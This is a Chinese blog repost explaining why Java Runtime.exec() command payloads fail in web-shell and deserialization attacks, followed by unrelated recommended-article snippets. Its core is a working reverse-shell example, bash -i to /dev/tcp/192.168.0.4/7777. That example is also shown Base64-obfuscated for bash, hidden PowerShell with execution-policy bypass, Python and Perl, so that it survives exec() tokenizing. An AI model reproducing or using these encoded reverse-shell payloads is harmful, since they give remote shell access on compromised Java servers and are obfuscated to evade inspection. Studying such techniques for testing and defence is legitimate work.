java runtime exec_java.lang.Runtime.exec() Payload知识点详解

最新推荐文章于 2024-07-23 04:14:32 发布
最新推荐文章于 2024-07-23 04:14:32 发布
阅读量571 收藏 1
点赞数
文章标签: java runtime exec
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34732602/article/details/114426232
版权

有时,通过Runtime.getRuntime().exec()执行命令的有效负载有时会失败。使用Web Shell,反序列化利用或通过其他媒介时,可能会发生这种情况。

有时这是因为重定向和管道字符的使用在启动过程的上下文中没有意义。例如,在shell中执行ls> dir_listing会将当前目录的列表输出到名为dir_listing的文件中。但是在exec()函数的上下文中,该命令将被解释为获取>和dir_listing目录的列表。

有时,StringTokenizer类会破坏其中包含空格的参数,该类将命令字符串按空格分隔。像ls“我的目录”之类的东西将被解释为ls“我的目录”。

借助Base64编码,下面的转换器可以帮助减少这些问题。它可以通过调用Bash或PowerShell来制作管道并重新定向,还可以确保参数内没有空格。

样例:

原文

bash -i >& /dev/tcp/192.168.0.4/7777 0>&1

编码后:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}

#bash

powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YgBhAHMAaAAgAC0AaQAgAD4AJgAgAC8AZABlAHYALwB0AGMAcAAvADEAOQAyAC4AMQA2ADgALgAwAC4ANAAvADcANwA3ADcAIAAwAD4AJgAxAA==

#powershell

python -c exec('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='.decode('base64'))

#python

perl -MMIME::Base64 -e eval(decode_base64('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='))

#perl

中间的字符均为“base64”编码。

知识点扩展:

java.lang.Runtime.getRuntime().exec(cmd)命令中参数不能用空格怎么办?

项目中无法执行c程序,猜测是exec()函数的问题

String cmd= exe_path + " " +video + " " +host + ":" + port;

Process process = runtime.exec(cmd);

到此这篇关于java.lang.Runtime.exec() Payload知识点详解的文章就介绍到这了,更多相关java.lang.Runtime.exec() Payload内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

开发知识点-JAVA-springboot+Spring Security/Shiro
aming小老弟
02-18 652
Spring 还提供了一个名为 Spring Security 的子项目,用于处理应用程序的安全需求。Spring Security 可以与 Shiro 集成,以提供更强大的安全功能。Shiro 提供了一套灵活的安全管理功能,可以处理用户身份验证、访问控制、会话管理等任务。因此,可以说 Shiro 是一个独立的安全框架,而 Spring 平台可以与 Shiro 一起使用来增强应用程序的安全性。Shiro 和 Spring 平台是两个不同的项目,它们可以在一起使用来提供安全认证和授权功能。
Java知识点概览
qq_48403611的博客
08-03 3507
java后端开发常见面试题总结
Java反序列化生成Payload附利用脚本
02-12
Java反序列化生成Payload附利用脚本,帮助运维测试weblogic及jboss等中间件的漏洞。
Java用法】代码参数里的 payload 是什么意思?
No8g攻城狮的博客
03-23 5843
首先解释一下什么是 payload? payload 英语单词意思是“(导弹、火箭等的)有效载荷,有效负荷;收费载重,酬载;(工厂、企业等)工资负担”。 对于程序员来说,有效载重究竟是个什么,又是一个新的问题! 要解释什么是有效载重,拿货运运输行业比喻一下: 例如有一位客户需要支付一笔费用委托货车司机运送一车钢板,钢板本身的重量、车子的重量、司机的重量等等,这些都属于载 重(load)。...
java.lang.Runtime.exec() Payload Workarounds
angaoux03775的博客
11-27 965
由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码 编码工具: 地址: http://jackson.thuraisamy.me/runtime-exec-payloads.html 转载于:https://www.cnblogs.com/sevck/p/7904303.html...
java exec 输入,java.lang.Runtime.exec()的左膀右臂:流输入和流读取
weixin_42510888的博客
03-13 279
java.lang.Runtime.exec()的左膀右臂:流输入和流读取在java.lang.Runtime.exec的使用中,我们经常会用到将重定向命令执行的输入/结果或者将错误信息读取出来.那么,在使用过程中,我们如何正确的使用呢?什么是java.lang.Runtime首先我们要明确一点,什么是Java.lang.Runtime? 我们来看官方[->link” Every Java ...
payload java_ResultPayload.java
weixin_39582656的博客
02-19 148
/** Copyright (C) 2017 The Android Open Source Project** Licensed under the Apache License, Version 2.0 (the "License");* you may not use this file except in compliance with the License.* You may obta...
java.lang.Runtime.exec() Payload知识点详解
08-24
java.lang.Runtime.exec() Payload知识点详解 Java.lang.Runtime.exec() 方法是 Java 语言中用于执行操作系统命令的方法,它可以将参数传递给命令,并执行命令以获取结果。但是,在使用该方法时,需要注意一些重要...
JAVA反序列化CC1分析
Re_ly0n的博客
03-26 5635
反序列化的原理 首先是要继承Serialize类只有继承了这个类菜能够进行序列化,如果某一个类没有继承serialize类并在一条利用链中所需要的地方,我们就可以通过反射来进行处理。例如在javaRuntime.getRuntime()是没有继承seralize类的 但是Runtime.class是继承了的 这样以来就可以通过反射来进行序列化和反序列化,反射核心代码如下 上面的代码都是可以成功弹出计算器的。利用链的构造尝试使用同名不同类的方法来进行调用。在这里就是复习...
java面试题
qq_40309277的博客
05-02 1349
Servlet运行原理以及生命周期 http://www.cnblogs.com/fifiyong/p/6390805.htmlmysql db cpu过高的情况跨域原理及解决办法session 与 cookie@RequestParam和@RequestBody的区别Redis、MongoDB及Memcached的区别理解java类加载器以及ClassLoader类组合索引的使用JVM调优总结 ...
java request payload_jmeter java 请求 payload
weixin_35653388的博客
02-16 658
1.注册页面抓包看见内容如下:POST http://test.nnzhp.cn/bbs/forum.php?mod=post&action=edit&extra=&editsubmit=yes HTTP/1.1Host: test.nnzhp.cnConnection: keep-aliveContent-Length: 1311Cache-Control: max-ag...
payload java,使用Java发送HTTP Post Payload
weixin_35178718的博客
02-12 432
I'm trying to connect to the grooveshark API, this is the http requestPOST URLhttp://api.grooveshark.com/ws3.php?sig=f699614eba23b4b528cb830305a9fc77POST payload{"method":'addUserFavoriteSong",'parame...
java runtime exec 结果,Java Runtime exec()方法
weixin_32367041的博客
03-13 1178
Java Runtime exec()方法java.lang.Runtime.exec(String command, String[] envp, File dir)方法在指定环境和工作目录的独立进程中执行指定的字符串命令。这是一个方便的方法。exec(command, envp, dir)调用行为完全相同于调用 exec(cmdarray, envp, dir),其中cmdarray是命令的...
调用java.lang.Runtime.exec的正确姿势
热门推荐
白衣
07-12 1万+
今天写一个用到编译的程序,遇到了问题。在调用runtime.exec("javac HelloWorld.java");运行完美,也就是有生成.class。 而到了runtime.exec("java HelloWorld >> output.txt");却怎么也无法重定向输出,连output.txt文件也生成不了。 测试"echo hello >> 1.txt" 也是不可以,甚是头疼,于是乎翻阅资料,这才发现了一个认识上的误区,就是exec(str)中 不能把str完全看作命令行执行的
java.lang.Runtime.exec的笔记
lang_m的专栏
12-08 4439
2005-12-7 晚 Lang_m这是Michael C.Daconta对Java一系列Traps文章中的一篇,题目是WhenRuntime.exec() wont 原文链接在http://www.javaworld.com/javaworld/jw-12-2000/jw-1229-traps.html 边看他的文章也正好了解一下Runtime类 
java.lang.Runtime 运行时类 执行 dos 、cmd 命令、VBS 脚本
蚩尤后裔-汪茂雄
05-11 2513
目录 Runtime 运行时类概述 exec(String command) 参数格式详解 exec(String command, String[] envp) exec(String command, String[] envp, File dir) exec(String[] cmdarray, String[] envp, File dir) 运行 VBS 脚本文件 Ru...
java 怎么手动填加request payload请求参数
最新发布
weixin_41077974的博客
07-23 153
Java中手动添加Request Payload请求参数 在Java开发中,我们经常需要通过HTTP请求与服务端进行数据交互。其中,POST请求是一种常见的方式,它允许我们在请求体(payload)中发送数据。有时,我们可能需要手动添加请求参数到payload中,而不是使用自动序列化的方法。本文将介绍如何在Java中手动添...
Java中执行linux命令 Runtimeexec方法
好记性不如烂笔头
08-30 4221
有时候在Java程序中需要调用linux命令或shell脚本,而java.lang.Runtime类中的exec()方法支持此操作。 名词解释 java.lang.Runtime 1 》每个Java应用程序都有一个Runtime类的Runtime ,允许应用程序与运行应用程序的环境进行链接。 当前运行时可以从getRuntime方法获得。 2 》应用程序无法创建自己的此类的实例。 ja...
java.lang.Runtime.exec的左膀右臂:流输入和流读取
白衣
07-13 2455
java.lang.Runtime.exec的使用中,我们经常会用到将重定向命令执行的输入/结果或者将错误信息读取出来.那么,在使用过程中,我们如何正确的使用呢?
payload-dumper-工具:从payload.bin中提取系统img文件
解包payload.bin文件,即是指将固件中的payload部分提取出来,以便于进行进一步的分析或修改。本文件描述了如何使用名为"payload-dumper"的工具来解包payload.bin文件,并从中提取系统相关.img文件的过程。 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值